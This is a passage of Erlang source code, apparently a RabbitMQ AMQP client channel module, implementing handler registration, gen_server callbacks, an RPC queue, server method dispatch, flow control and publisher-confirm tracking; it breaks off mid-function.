%% @doc Removes the confirm handler, if it exists. Does nothing if there is no
%% such handler (but see the note on unregister_return_handler/1).
unregister_confirm_handler(Channel) ->
    gen_server:cast(Channel, unregister_confirm_handler).
%% @spec (Channel, FlowHandler) -> ok
%% where
%% Channel = pid()
%% FlowHandler = pid()
%% @doc This registers a handler to deal with channel flow notifications.
%% The registered process will receive #channel.flow{} records.
register_flow_handler(Channel, FlowHandler) ->
    gen_server:cast(Channel, {register_flow_handler, FlowHandler} ).
%% @spec (Channel) -> ok
%% where
%% Channel = pid()
%% @doc Removes the flow handler, if it exists. Does nothing if there is no
%% such handler (but see the note on unregister_return_handler/1).
unregister_flow_handler(Channel) ->
    gen_server:cast(Channel, unregister_flow_handler).
%% @spec (Channel, Msg) -> ok
%% where
%% Channel = pid()
%% Msg = any()
%% @doc This causes the channel to invoke Consumer:handle_call/2,
%% where Consumer is the amqp_gen_consumer implementation registered with
%% the channel.
call_consumer(Channel, Msg) ->
    gen_server:call(Channel, {call_consumer, Msg}, amqp_util:call_timeout()).
%% @spec (Channel, BasicConsume, Subscriber) -> ok
%% where
%% Channel = pid()
%% BasicConsume = amqp_method()
%% Subscriber = pid()
%% @doc Subscribe the given pid to a queue using the specified
%% basic.consume method. The method record is matched in the function
%% head, so any other method is rejected with a function_clause error.
subscribe(Channel, BasicConsume = #'basic.consume'{}, Subscriber) ->
    gen_server:call(Channel, {subscribe, BasicConsume, Subscriber}, amqp_util:call_timeout()).
%%---------------------------------------------------------------------------
%% Internal interface
%%---------------------------------------------------------------------------
%% @private Starts the channel process, linked to the caller.
start_link(Driver, Connection, ChannelNumber, Consumer, Identity) ->
    gen_server:start_link(
      ?MODULE, [Driver, Connection, ChannelNumber, Consumer, Identity], []).
%% @private Hands the writer pid to the channel (cast; see handle_cast).
set_writer(Pid, Writer) ->
    gen_server:cast(Pid, {set_writer, Writer}).
%% @private Enables manual consumer delivery flow control on the channel.
enable_delivery_flow_control(Pid) ->
    gen_server:cast(Pid, enable_delivery_flow_control).
%% @private Asks the channel to notify the queue that a delivery was
%% consumed (used with delivery flow control in the direct client).
notify_received({Pid, QPid, ServerChPid}) ->
    gen_server:cast(Pid, {send_notify, {QPid, ServerChPid}}).
%% @private
connection_closing(Pid, ChannelCloseType, Reason) ->
    gen_server:cast(Pid, {connection_closing, ChannelCloseType, Reason}).
%% @private
open(Pid) ->
    gen_server:call(Pid, open, amqp_util:call_timeout()).
%%---------------------------------------------------------------------------
%% gen_server callbacks
%%---------------------------------------------------------------------------
%% @private Initializes the channel state; the writer is set later via
%% set_writer/2 and all other fields start at their record defaults.
init([Driver, Connection, ChannelNumber, Consumer, Identity]) ->
    ?store_proc_name(Identity),
    {ok, #state{connection = Connection,
                driver = Driver,
                number = ChannelNumber,
                consumer = Consumer}}.
%% @private Opens the channel on the broker; reply is deferred to the
%% RPC bottom half.
handle_call(open, From, State) ->
    {noreply, rpc_top_half(#'channel.open'{}, none, From, none, noflow, State)};
%% @private
handle_call({close, Code, Text}, From, State) ->
    handle_close(Code, Text, From, State);
%% @private
handle_call({call, Method, AmqpMsg, Sender}, From, State) ->
    handle_method_to_server(Method, AmqpMsg, From, Sender, noflow, State);
%% Handles the delivery of messages from a direct channel
%% @private
handle_call({send_command_sync, Method, Content}, From, State) ->
    Ret = handle_method_from_server(Method, Content, State),
    gen_server:reply(From, ok),
    Ret;
%% Handles the delivery of messages from a direct channel
%% @private
handle_call({send_command_sync, Method}, From, State) ->
    Ret = handle_method_from_server(Method, none, State),
    gen_server:reply(From, ok),
    Ret;
%% @private
handle_call(next_publish_seqno, _From,
            State = #state{next_pub_seqno = SeqNo}) ->
    {reply, SeqNo, State};
handle_call({wait_for_confirms, Timeout}, From, State) ->
    handle_wait_for_confirms(From, Timeout, State);
%% @private Delegates to the registered amqp_gen_consumer implementation.
handle_call({call_consumer, Msg}, _From,
            State = #state{consumer = Consumer}) ->
    {reply, amqp_gen_consumer:call_consumer(Consumer, Msg), State};
%% @private
handle_call({subscribe, BasicConsume, Subscriber}, From, State) ->
    handle_method_to_server(BasicConsume, none, From, Subscriber, noflow,
                            State).
%% @private In the direct case the writer is linked so its failure takes
%% the channel down too.
handle_cast({set_writer, Writer}, State = #state{driver = direct}) ->
    link(Writer),
    {noreply, State#state{writer = Writer}};
handle_cast({set_writer, Writer}, State) ->
    {noreply, State#state{writer = Writer}};
%% @private
handle_cast(enable_delivery_flow_control, State) ->
    {noreply, State#state{delivery_flow_control = true}};
%% @private Tells the queue that a delivery has been handed to a consumer.
handle_cast({send_notify, {QPid, ChPid}}, State) ->
    rabbit_amqqueue_common:notify_sent(QPid, ChPid),
    {noreply, State};
%% @private
handle_cast({cast, Method, AmqpMsg, Sender, noflow}, State) ->
    handle_method_to_server(Method, AmqpMsg, none, Sender, noflow, State);
handle_cast({cast, Method, AmqpMsg, Sender, flow}, State) ->
    %% Return the credit taken by cast_flow/3 in the sender.
    credit_flow:ack(Sender),
    handle_method_to_server(Method, AmqpMsg, none, Sender, flow, State);
%% @private Handlers are monitored so they can be dropped if they die.
handle_cast({register_return_handler, ReturnHandler}, State) ->
    Ref = erlang:monitor(process, ReturnHandler),
    {noreply, State#state{return_handler = {ReturnHandler, Ref}}};
%% @private
%% NOTE(review): this clause only matches when a handler tuple is
%% registered; an unregister cast with return_handler =:= none appears
%% to have no matching clause — confirm intended behavior.
handle_cast(unregister_return_handler,
            State = #state{return_handler = {_ReturnHandler, Ref}}) ->
    erlang:demonitor(Ref),
    {noreply, State#state{return_handler = none}};
%% @private
handle_cast({register_confirm_handler, ConfirmHandler}, State) ->
    Ref = erlang:monitor(process, ConfirmHandler),
    {noreply, State#state{confirm_handler = {ConfirmHandler, Ref}}};
%% @private
handle_cast(unregister_confirm_handler,
            State = #state{confirm_handler = {_ConfirmHandler, Ref}}) ->
    erlang:demonitor(Ref),
    {noreply, State#state{confirm_handler = none}};
%% @private
handle_cast({register_flow_handler, FlowHandler}, State) ->
    Ref = erlang:monitor(process, FlowHandler),
    {noreply, State#state{flow_handler = {FlowHandler, Ref}}};
%% @private
handle_cast(unregister_flow_handler,
            State = #state{flow_handler = {_FlowHandler, Ref}}) ->
    erlang:demonitor(Ref),
    {noreply, State#state{flow_handler = none}};
%% Received from channels manager
%% @private
handle_cast({method, Method, Content, noflow}, State) ->
    handle_method_from_server(Method, Content, State);
%% Handles the situation when the connection closes without closing the channel
%% beforehand. The channel must block all further RPCs,
%% flush the RPC queue (optional), and terminate
%% @private
handle_cast({connection_closing, CloseType, Reason}, State) ->
    handle_connection_closing(CloseType, Reason, State);
%% @private
handle_cast({shutdown, Shutdown}, State) ->
    handle_shutdown(Shutdown, State).
%% Received from rabbit_channel in the direct case
%% @private
handle_info({send_command, Method}, State) ->
    handle_method_from_server(Method, none, State);
%% Received from rabbit_channel in the direct case
%% @private
handle_info({send_command, Method, Content}, State) ->
    handle_method_from_server(Method, Content, State);
%% Received from rabbit_channel in the direct case
%% @private
%% With manual delivery flow control the context {self(), QPid, ChPid}
%% travels with the delivery (the consumer notifies the queue when done);
%% otherwise the queue is notified immediately after dispatch.
handle_info({send_command_and_notify, QPid, ChPid,
             Method = #'basic.deliver'{}, Content},
            State = #state{delivery_flow_control = MFC}) ->
    case MFC of
        false -> handle_method_from_server(Method, Content, State),
                 rabbit_amqqueue_common:notify_sent(QPid, ChPid);
        true  -> handle_method_from_server(Method, Content,
                                           {self(), QPid, ChPid}, State)
    end,
    {noreply, State};
%% This comes from the writer or rabbit_channel
%% @private
handle_info({channel_exit, _ChNumber, Reason}, State) ->
    handle_channel_exit(Reason, State);
%% This comes from rabbit_channel in the direct case
handle_info({channel_closing, ChPid}, State) ->
    ok = rabbit_channel_common:ready_for_close(ChPid),
    {noreply, State};
%% @private
handle_info({bump_credit, Msg}, State) ->
    credit_flow:handle_bump_msg(Msg),
    {noreply, State};
%% @private
%% Armed by handle_connection_closing/3 when a flush was requested.
handle_info(timed_out_flushing_channel, State) ->
    ?LOG_WARN("Channel (~p) closing: timed out flushing while "
              "connection closing~n", [self()]),
    {stop, timed_out_flushing_channel, State};
%% @private
%% 'DOWN' clauses: a registered handler died. A 'shutdown' exit is
%% expected and unregistered quietly; any other reason is logged. Clause
%% order matters: the 'shutdown' clause must come before the generic one.
handle_info({'DOWN', _, process, ReturnHandler, shutdown},
            State = #state{return_handler = {ReturnHandler, _Ref}}) ->
    {noreply, State#state{return_handler = none}};
handle_info({'DOWN', _, process, ReturnHandler, Reason},
            State = #state{return_handler = {ReturnHandler, _Ref}}) ->
    ?LOG_WARN("Channel (~p): Unregistering return handler ~p because it died. "
              "Reason: ~p~n", [self(), ReturnHandler, Reason]),
    {noreply, State#state{return_handler = none}};
%% @private
handle_info({'DOWN', _, process, ConfirmHandler, shutdown},
            State = #state{confirm_handler = {ConfirmHandler, _Ref}}) ->
    {noreply, State#state{confirm_handler = none}};
handle_info({'DOWN', _, process, ConfirmHandler, Reason},
            State = #state{confirm_handler = {ConfirmHandler, _Ref}}) ->
    ?LOG_WARN("Channel (~p): Unregistering confirm handler ~p because it died. "
              "Reason: ~p~n", [self(), ConfirmHandler, Reason]),
    {noreply, State#state{confirm_handler = none}};
%% @private
handle_info({'DOWN', _, process, FlowHandler, shutdown},
            State = #state{flow_handler = {FlowHandler, _Ref}}) ->
    {noreply, State#state{flow_handler = none}};
handle_info({'DOWN', _, process, FlowHandler, Reason},
            State = #state{flow_handler = {FlowHandler, _Ref}}) ->
    ?LOG_WARN("Channel (~p): Unregistering flow handler ~p because it died. "
              "Reason: ~p~n", [self(), FlowHandler, Reason]),
    {noreply, State#state{flow_handler = none}};
%% Fallback 'DOWN': assumed to be a monitored queue process (it is passed
%% to notify_sent_queue_down/1).
handle_info({'DOWN', _, process, QPid, _Reason}, State) ->
    rabbit_amqqueue_common:notify_sent_queue_down(QPid),
    {noreply, State};
%% A wait_for_confirms caller timed out; reply 'timeout' only if it is
%% still waiting (notify_confirm_waiters/1 may have answered it already).
handle_info({confirm_timeout, From}, State = #state{waiting_set = WSet}) ->
    case gb_trees:lookup(From, WSet) of
        none ->
            {noreply, State};
        {value, _} ->
            gen_server:reply(From, timeout),
            {noreply, State#state{waiting_set = gb_trees:delete(From, WSet)}}
    end.
%% @private
%% Flush any outstanding writes before the process exits. gen_server
%% ignores the return value of terminate/2, so returning State rather
%% than the conventional 'ok' is harmless.
terminate(_Reason, State) ->
    flush_writer(State),
    State.
%% @private
%% Hot code upgrade: the state is carried over unchanged.
code_change(_OldVsn, State, _Extra) ->
    {ok, State}.
%%---------------------------------------------------------------------------
%% RPC mechanism
%%---------------------------------------------------------------------------
%% Validate and dispatch a client->server method. Three facts are combined
%% into one tuple so a single case can pick the outcome:
%%   - check_invalid_method/1: is this method allowed through this API?
%%   - From: 'none' for casts (no caller to reply to), otherwise a caller
%%   - check_block/3: is the channel currently able to send?
handle_method_to_server(Method, AmqpMsg, From, Sender, Flow,
                        State = #state{unconfirmed_set = USet}) ->
    case {check_invalid_method(Method), From,
          check_block(Method, AmqpMsg, State)} of
        {ok, _, ok} ->
            %% Publisher-confirm bookkeeping on the sequence number.
            State1 = case {Method, State#state.next_pub_seqno} of
                         {#'confirm.select'{}, 0} ->
                             %% The confirm seqno is set to 1 on the
                             %% first confirm.select only.
                             State#state{next_pub_seqno = 1};
                         {#'basic.publish'{}, 0} ->
                             %% Not in confirm mode: nothing to track.
                             State;
                         {#'basic.publish'{}, SeqNo} ->
                             %% Confirm mode: remember this publish as
                             %% unconfirmed and advance the counter.
                             State#state{unconfirmed_set =
                                             gb_sets:add(SeqNo, USet),
                                         next_pub_seqno = SeqNo + 1};
                         _ ->
                             State
                     end,
            {noreply, rpc_top_half(Method, build_content(AmqpMsg),
                                   From, Sender, Flow, State1)};
        {ok, none, BlockReply} ->
            %% Blocked cast: nobody to reply to, so log and drop.
            ?LOG_WARN("Channel (~p): discarding method ~p in cast.~n"
                      "Reason: ~p~n", [self(), Method, BlockReply]),
            {noreply, State};
        {ok, _, BlockReply} ->
            {reply, BlockReply, State};
        {{_, InvalidMethodMessage}, none, _} ->
            ?LOG_WARN("Channel (~p): ignoring cast of ~p method. " ++
                      InvalidMethodMessage ++ "~n", [self(), Method]),
            {noreply, State};
        {{InvalidMethodReply, _}, _, _} ->
            {reply, {error, InvalidMethodReply}, State}
    end.
%% Build a channel.close method for an application-initiated close and
%% queue it; if the channel is already closing, the blocking reason is
%% returned to the caller instead.
handle_close(Code, Text, From, State) ->
    Close = #'channel.close'{reply_code = Code,
                             reply_text = Text,
                             class_id = 0,
                             method_id = 0},
    case check_block(Close, none, State) of
        ok         -> {noreply, rpc_top_half(Close, none, From, none, noflow,
                                             State)};
        BlockReply -> {reply, BlockReply, State}
    end.
%% Enqueue an RPC request. If the queue was empty before the insert, the
%% new request is now at the head and is dispatched to the server
%% immediately; otherwise it waits until rpc_bottom_half/2 reaches it.
rpc_top_half(Method, Content, From, Sender, Flow,
             State0 = #state{rpc_requests = Pending}) ->
    Request = {From, Sender, Method, Content, Flow},
    State1 = State0#state{rpc_requests = queue:in(Request, Pending)},
    case queue:is_empty(Pending) of
        true  -> do_rpc(State1);
        false -> State1
    end.
%% Complete the RPC at the head of the queue: reply to its caller (if it
%% was a call rather than a cast) and then pump the next queued request.
rpc_bottom_half(Reply, State = #state{rpc_requests = Pending}) ->
    {{value, {From, _Sender, _Method, _Content, _Flow}}, Pending1} =
        queue:out(Pending),
    case From of
        none -> ok;
        _    -> gen_server:reply(From, Reply)
    end,
    do_rpc(State#state{rpc_requests = Pending1}).
%% Pump the RPC queue. The request at the head is written to the server.
%% For a synchronous method the request is deliberately left at the head
%% of the queue (note: the returned state keeps Q, not NewQ) until the
%% server's reply arrives and rpc_bottom_half/2 pops it. Asynchronous
%% methods are replied to with 'ok' immediately and the pump recurses.
do_rpc(State = #state{rpc_requests = Q,
                      closing = Closing}) ->
    case queue:out(Q) of
        {{value, {From, Sender, Method, Content, Flow}}, NewQ} ->
            State1 = pre_do(Method, Content, Sender, State),
            DoRet = do(Method, Content, Flow, State1),
            case ?PROTOCOL:is_method_synchronous(Method) of
                true  -> State1;
                false -> case {From, DoRet} of
                             {none, _} -> ok;
                             {_, ok}   -> gen_server:reply(From, ok);
                             _         -> ok
                             %% Do not reply if error in do. Expecting
                             %% {channel_exit, _, _}
                         end,
                         do_rpc(State1#state{rpc_requests = NewQ})
            end;
        {empty, NewQ} ->
            %% Queue drained; if the whole connection is closing we can
            %% now trigger our own shutdown.
            case Closing of
                {connection, Reason} ->
                    gen_server:cast(self(),
                                    {shutdown, {connection_closing, Reason}});
                _ ->
                    ok
            end,
            State#state{rpc_requests = NewQ}
    end.
%% Method of the RPC currently awaiting a server reply (head of the
%% queue). Crashes (badmatch on 'empty') if no RPC is pending.
pending_rpc_method(#state{rpc_requests = Q}) ->
    {value, {_From, _Sender, Method, _Content, _Flow}} = queue:peek(Q),
    Method.
%% Side effects performed just before a method is written to the wire:
%% channel.close marks the channel as closing; consume/cancel are first
%% handed to the consumer callback module.
pre_do(#'channel.close'{reply_code = Code, reply_text = Text}, none,
       _Sender, State) ->
    State#state{closing = {just_channel, {app_initiated_close, Code, Text}}};
pre_do(#'basic.consume'{} = Method, none, Sender, State) ->
    ok = call_to_consumer(Method, Sender, State),
    State;
pre_do(#'basic.cancel'{} = Method, none, Sender, State) ->
    ok = call_to_consumer(Method, Sender, State),
    State;
pre_do(_, _, _, State) ->
    State.
%%---------------------------------------------------------------------------
%% Handling of methods from the server
%%---------------------------------------------------------------------------
%% Guard around server->client method handling:
%%   - connection-class methods must never arrive on a non-zero channel;
%%     that is treated as server misbehaviour;
%%   - while this channel is closing, drop everything except
%%     channel.close / channel.close_ok;
%%   - otherwise run the supplied continuation.
safely_handle_method_from_server(Method, Content,
                                 Continuation,
                                 State = #state{closing = Closing}) ->
    case is_connection_method(Method) of
        true  -> server_misbehaved(
                   #amqp_error{name = command_invalid,
                               explanation = "connection method on "
                                             "non-zero channel",
                               method = element(1, Method)},
                   State);
        false -> Drop = case {Closing, Method} of
                            {{just_channel, _}, #'channel.close'{}}    -> false;
                            {{just_channel, _}, #'channel.close_ok'{}} -> false;
                            {{just_channel, _}, _}                     -> true;
                            _                                          -> false
                        end,
                 if Drop -> ?LOG_INFO("Channel (~p): dropping method ~p from "
                                      "server because channel is closing~n",
                                      [self(), {Method, Content}]),
                            {noreply, State};
                    true ->
                            Continuation()
                 end
    end.
%% Wrap a server->client method (with optional content, and optionally a
%% delivery context for manual flow control) in a continuation and run it
%% through the closing/misbehaviour guard.
handle_method_from_server(Method, Content, State) ->
    Continuation =
        fun() ->
                handle_method_from_server1(Method, amqp_msg(Content), State)
        end,
    safely_handle_method_from_server(Method, Content, Continuation, State).
handle_method_from_server(Method = #'basic.deliver'{},
                          Content, DeliveryCtx, State) ->
    Continuation =
        fun() ->
                handle_method_from_server1(Method, amqp_msg(Content),
                                           DeliveryCtx, State)
        end,
    safely_handle_method_from_server(Method, Content, Continuation, State).
%% Per-method handling of server->client methods. Replies that complete a
%% pending RPC go through rpc_bottom_half/2; consumer-related methods are
%% forwarded to the consumer callback module; acks/nacks update the
%% unconfirmed set. Clause order matters (specific methods before the
%% catch-all RPC-reply clauses at the bottom).
handle_method_from_server1(#'channel.open_ok'{}, none, State) ->
    {noreply, rpc_bottom_half(ok, State)};
handle_method_from_server1(#'channel.close'{reply_code = Code,
                                            reply_text = Text},
                           none,
                           State = #state{closing = {just_channel, _}}) ->
    %% Both client and server sent close at the same time. Don't shutdown yet,
    %% wait for close_ok.
    do(#'channel.close_ok'{}, none, noflow, State),
    {noreply,
     State#state{
       closing = {just_channel, {server_initiated_close, Code, Text}}}};
handle_method_from_server1(#'channel.close'{reply_code = Code,
                                            reply_text = Text}, none, State) ->
    do(#'channel.close_ok'{}, none, noflow, State),
    handle_shutdown({server_initiated_close, Code, Text}, State);
handle_method_from_server1(#'channel.close_ok'{}, none,
                           State = #state{closing = Closing}) ->
    %% The shutdown reason depends on who initiated the close: an
    %% app-initiated close replies 'ok' to the pending caller, a
    %% server-initiated one replies 'closing'.
    case Closing of
        {just_channel, {app_initiated_close, _, _} = Reason} ->
            handle_shutdown(Reason, rpc_bottom_half(ok, State));
        {just_channel, {server_initiated_close, _, _} = Reason} ->
            handle_shutdown(Reason,
                            rpc_bottom_half(closing, State));
        {connection, Reason} ->
            handle_shutdown({connection_closing, Reason}, State)
    end;
handle_method_from_server1(#'basic.consume_ok'{} = ConsumeOk, none, State) ->
    %% Pair the ok with the pending basic.consume (asserted by the match).
    Consume = #'basic.consume'{} = pending_rpc_method(State),
    ok = call_to_consumer(ConsumeOk, Consume, State),
    {noreply, rpc_bottom_half(ConsumeOk, State)};
handle_method_from_server1(#'basic.cancel_ok'{} = CancelOk, none, State) ->
    Cancel = #'basic.cancel'{} = pending_rpc_method(State),
    ok = call_to_consumer(CancelOk, Cancel, State),
    {noreply, rpc_bottom_half(CancelOk, State)};
%% Server-initiated cancel: there is no pending RPC to complete.
handle_method_from_server1(#'basic.cancel'{} = Cancel, none, State) ->
    ok = call_to_consumer(Cancel, none, State),
    {noreply, State};
handle_method_from_server1(#'basic.deliver'{} = Deliver, AmqpMsg, State) ->
    ok = call_to_consumer(Deliver, AmqpMsg, State),
    {noreply, State};
handle_method_from_server1(#'channel.flow'{active = Active} = Flow, none,
                           State = #state{flow_handler = FlowHandler}) ->
    case FlowHandler of none -> ok;
                        {Pid, _Ref} -> Pid ! Flow
    end,
    %% Putting the flow_ok in the queue so that the RPC queue can be
    %% flushed beforehand. Methods that made it to the queue are not
    %% blocked in any circumstance.
    {noreply, rpc_top_half(#'channel.flow_ok'{active = Active}, none, none,
                           none, noflow, State#state{flow_active = Active})};
handle_method_from_server1(
  #'basic.return'{} = BasicReturn, AmqpMsg,
  State = #state{return_handler = ReturnHandler}) ->
    case ReturnHandler of
        none -> ?LOG_WARN("Channel (~p): received {~p, ~p} but there is "
                          "no return handler registered~n",
                          [self(), BasicReturn, AmqpMsg]);
        {Pid, _Ref} -> Pid ! {BasicReturn, AmqpMsg}
    end,
    {noreply, State};
handle_method_from_server1(#'basic.ack'{} = BasicAck, none,
                           #state{confirm_handler = none} = State) ->
    {noreply, update_confirm_set(BasicAck, State)};
handle_method_from_server1(#'basic.ack'{} = BasicAck, none,
                           #state{confirm_handler = {CH, _Ref}} = State) ->
    CH ! BasicAck,
    {noreply, update_confirm_set(BasicAck, State)};
%% Unlike an unhandled ack, an unhandled nack is worth a warning.
handle_method_from_server1(#'basic.nack'{} = BasicNack, none,
                           #state{confirm_handler = none} = State) ->
    ?LOG_WARN("Channel (~p): received ~p but there is no "
              "confirm handler registered~n", [self(), BasicNack]),
    {noreply, update_confirm_set(BasicNack, State)};
handle_method_from_server1(#'basic.nack'{} = BasicNack, none,
                           #state{confirm_handler = {CH, _Ref}} = State) ->
    CH ! BasicNack,
    {noreply, update_confirm_set(BasicNack, State)};
handle_method_from_server1(#'basic.credit_drained'{} = CreditDrained, none,
                           #state{consumer = Consumer} = State) ->
    Consumer ! CreditDrained,
    {noreply, State};
%% Catch-all: any other method (with or without content) is assumed to be
%% the reply to the RPC at the head of the queue.
handle_method_from_server1(Method, none, State) ->
    {noreply, rpc_bottom_half(Method, State)};
handle_method_from_server1(Method, Content, State) ->
    {noreply, rpc_bottom_half({Method, Content}, State)}.
%% only used with manual consumer-to-queue flow control
%% Same as the 3-arity deliver clause, but the delivery context
%% {ChannelPid, QPid, ChPid} (built in handle_info/2) is passed through to
%% the consumer so it can notify the queue itself when done.
handle_method_from_server1(#'basic.deliver'{} = Deliver, AmqpMsg,
                           DeliveryCtx, State) ->
    ok = call_to_consumer(Deliver, AmqpMsg, DeliveryCtx, State),
    {noreply, State}.
%%---------------------------------------------------------------------------
%% Other handle_* functions
%%---------------------------------------------------------------------------
%% The enclosing connection is going down. If a flush was requested and
%% RPCs are still queued (and the channel itself is not already closing),
%% arm a timeout and let the queue drain; otherwise shut down now.
handle_connection_closing(CloseType, Reason,
                          State = #state{rpc_requests = RpcQueue,
                                         closing = Closing}) ->
    NewState = State#state{closing = {connection, Reason}},
    case {CloseType, Closing, queue:is_empty(RpcQueue)} of
        {flush, false, false} ->
            erlang:send_after(?TIMEOUT_FLUSH, self(),
                              timed_out_flushing_channel),
            {noreply, NewState};
        {flush, {just_channel, _}, false} ->
            {noreply, NewState};
        _ ->
            handle_shutdown({connection_closing, Reason}, NewState)
    end.
%% A channel infrastructure process died.
handle_channel_exit(Reason = #amqp_error{name = ErrorName, explanation = Expl},
                    State = #state{connection = Connection, number = Number}) ->
    %% Sent by rabbit_channel for hard errors in the direct case
    ?LOG_ERR("connection ~p, channel ~p - error:~n~p~n",
             [Connection, Number, Reason]),
    {true, Code, _} = ?PROTOCOL:lookup_amqp_exception(ErrorName),
    ReportedReason = {server_initiated_close, Code, Expl},
    amqp_gen_connection:hard_error_in_channel(
      Connection, self(), ReportedReason),
    handle_shutdown({connection_closing, ReportedReason}, State);
handle_channel_exit(Reason, State) ->
    %% Unexpected death of a channel infrastructure process
    {stop, {infrastructure_died, Reason}, State}.
%% Map a shutdown reason to a gen_server stop tuple. Reply code 200
%% (AMQP reply-success) and a plain 'normal' connection close terminate
%% with reason 'normal'; anything else stops with {shutdown, Reason}.
handle_shutdown({_, 200, _}, State) ->
    {stop, normal, State};
handle_shutdown({connection_closing, {_, 200, _}}, State) ->
    {stop, normal, State};
handle_shutdown({connection_closing, normal}, State) ->
    {stop, normal, State};
handle_shutdown(Reason, State) ->
    {stop, {shutdown, Reason}, State}.
%%---------------------------------------------------------------------------
%% Internal plumbing
%%---------------------------------------------------------------------------
%% Write a method (plus optional content) to the wire: via rabbit_writer
%% for network connections, via rabbit_channel for direct ones. The
%% old-style 'catch' is deliberate: on failure the channel expects to be
%% told via a {channel_exit, _, _} message rather than crash here, so do
%% not "modernise" it into try/catch without preserving that contract.
do(Method, Content, Flow, #state{driver = network, writer = W}) ->
    %% Catching because it expects the {channel_exit, _, _} message on error
    catch case {Content, Flow} of
              {none, _}   -> rabbit_writer:send_command(W, Method);
              {_, flow}   -> rabbit_writer:send_command_flow(W, Method,
                                                             Content);
              {_, noflow} -> rabbit_writer:send_command(W, Method, Content)
          end;
do(Method, Content, Flow, #state{driver = direct, writer = W}) ->
    %% ditto catching because...
    catch case {Content, Flow} of
              {none, _}   -> rabbit_channel_common:do(W, Method);
              {_, flow}   -> rabbit_channel_common:do_flow(W, Method, Content);
              {_, noflow} -> rabbit_channel_common:do(W, Method, Content)
          end.
%% Synchronously flush the network writer, tolerating a writer that has
%% already exited (exit:noproc). Nothing to flush for the direct driver.
%% The clauses match on mutually exclusive driver values, so their order
%% is irrelevant.
flush_writer(#state{driver = direct}) ->
    ok;
flush_writer(#state{driver = network, writer = W}) ->
    try
        rabbit_writer:flush(W)
    catch
        exit:noproc -> ok
    end.
%% Wire content -> #amqp_msg{} ('none' passes through for content-less
%% methods).
amqp_msg(none) ->
    none;
amqp_msg(Content) ->
    {Props, Payload} = rabbit_basic_common:from_content(Content),
    #amqp_msg{props = Props, payload = Payload}.
%% #amqp_msg{} -> wire content; the inverse of amqp_msg/1.
build_content(none) ->
    none;
build_content(#amqp_msg{props = Props, payload = Payload}) ->
    rabbit_basic_common:build_content(Props, Payload).
%% May this method be sent right now? Clause order matters: a closing
%% channel or connection blocks everything; otherwise content-less
%% methods always pass, and methods carrying content are blocked while
%% the server has throttled us via channel.flow (flow_active = false).
check_block(_Method, _AmqpMsg, #state{closing = {just_channel, _}}) ->
    closing;
check_block(_Method, _AmqpMsg, #state{closing = {connection, _}}) ->
    closing;
check_block(_Method, none, #state{}) ->
    ok;
check_block(_Method, #amqp_msg{}, #state{flow_active = false}) ->
    blocked;
check_block(_Method, _AmqpMsg, #state{}) ->
    ok.
%% Reject methods that must not be sent through this API directly:
%% channel.open/close have dedicated entry points, and connection-class
%% methods belong to the connection process. Returns 'ok' or a
%% {Reason, Message} pair.
check_invalid_method(#'channel.open'{}) ->
    {use_amqp_connection_module,
     "Use amqp_connection:open_channel/{1,2} instead"};
check_invalid_method(#'channel.close'{}) ->
    {use_close_function, "Use close/{1,3} instead"};
check_invalid_method(Method) ->
    case is_connection_method(Method) of
        false -> ok;
        true  -> {connection_methods_not_allowed,
                  "Sending connection methods is not allowed"}
    end.
%% A method belongs to the connection class iff its class id maps to
%% 'connection' in the protocol tables.
is_connection_method(Method) ->
    {ClassId, _MethodId} = ?PROTOCOL:method_id(element(1, Method)),
    connection =:= ?PROTOCOL:lookup_class_name(ClassId).
%% The server sent something it shouldn't have. If the error maps to a
%% hard (connection-level, channel 0) error, shut down; for a soft error,
%% flush and close this channel with the mapped channel.close.
server_misbehaved(#amqp_error{} = AmqpError, State = #state{number = Number}) ->
    case rabbit_binary_generator:map_exception(Number, AmqpError, ?PROTOCOL) of
        {0, _} ->
            handle_shutdown({server_misbehaved, AmqpError}, State);
        {_, Close} ->
            ?LOG_WARN("Channel (~p) flushing and closing due to soft "
                      "error caused by the server ~p~n", [self(), AmqpError]),
            Self = self(),
            %% The close is issued from a separate process: call/2
            %% presumably performs a synchronous call into this gen_server,
            %% which would deadlock if made from within it — confirm.
            spawn(fun () -> call(Self, Close) end),
            {noreply, State}
    end.
%% Record a broker confirm. Acks and nacks both shrink the unconfirmed
%% set; a nack additionally clears only_acks_received so that waiters in
%% wait_for_confirms get 'false'.
update_confirm_set(#'basic.ack'{delivery_tag = SeqNo,
                                multiple = Multiple},
                   State = #state{unconfirmed_set = USet}) ->
    maybe_notify_waiters(
      State#state{unconfirmed_set =
                      update_unconfirmed(SeqNo, Multiple, USet)});
update_confirm_set(#'basic.nack'{delivery_tag = SeqNo,
                                 multiple = Multiple},
                   State = #state{unconfirmed_set = USet}) ->
    maybe_notify_waiters(
      State#state{unconfirmed_set = update_unconfirmed(SeqNo, Multiple, USet),
                  only_acks_received = false}).
%% Remove SeqNo from the set of unconfirmed publish sequence numbers.
%% When Multiple is true, the broker confirmed a whole prefix at once, so
%% every element up to and including SeqNo is removed.
update_unconfirmed(SeqNo, false, USet) ->
    gb_sets:del_element(SeqNo, USet);
update_unconfirmed(SeqNo, true, USet) ->
    case gb_sets:is_empty(USet) of
        true ->
            USet;
        false ->
            {Smallest, Rest} = gb_sets:take_smallest(USet),
            if
                Smallest > SeqNo -> USet;
                true             -> update_unconfirmed(SeqNo, true, Rest)
            end
    end.
%% Once the unconfirmed set drains to empty, wake up every caller parked
%% in wait_for_confirms; otherwise leave the state untouched.
maybe_notify_waiters(State = #state{unconfirmed_set = USet}) ->
    case gb_sets:is_empty(USet) of
        true  -> notify_confirm_waiters(State);
        false -> State
    end.
%% Reply to every waiter with the accumulated ack/nack verdict, cancel
%% their timeout timers, and reset the waiting set and the
%% only_acks_received flag for the next round.
notify_confirm_waiters(State = #state{waiting_set = WSet,
                                      only_acks_received = OAR}) ->
    lists:foreach(
      fun({From, TRef}) ->
              safe_cancel_timer(TRef),
              gen_server:reply(From, OAR)
      end, gb_trees:to_list(WSet)),
    State#state{waiting_set = gb_trees:empty(),
                only_acks_received = true}.
%% next_pub_seqno = 0 means confirm.select was never issued. If nothing
%% is unconfirmed, answer 'true' immediately; otherwise park the caller
%% in waiting_set, optionally arming a timeout (the * 1000 implies
%% Timeout is given in seconds; send_after takes milliseconds).
handle_wait_for_confirms(_From, _Timeout, State = #state{next_pub_seqno = 0}) ->
    {reply, {error, not_in_confirm_mode}, State};
handle_wait_for_confirms(From, Timeout,
                         State = #state{unconfirmed_set = USet,
                                        waiting_set = WSet}) ->
    case gb_sets:is_empty(USet) of
        true  -> {reply, true, State};
        false -> TRef = case Timeout of
                            infinity -> undefined;
                            _        -> erlang:send_after(
                                          Timeout * 1000, self(),
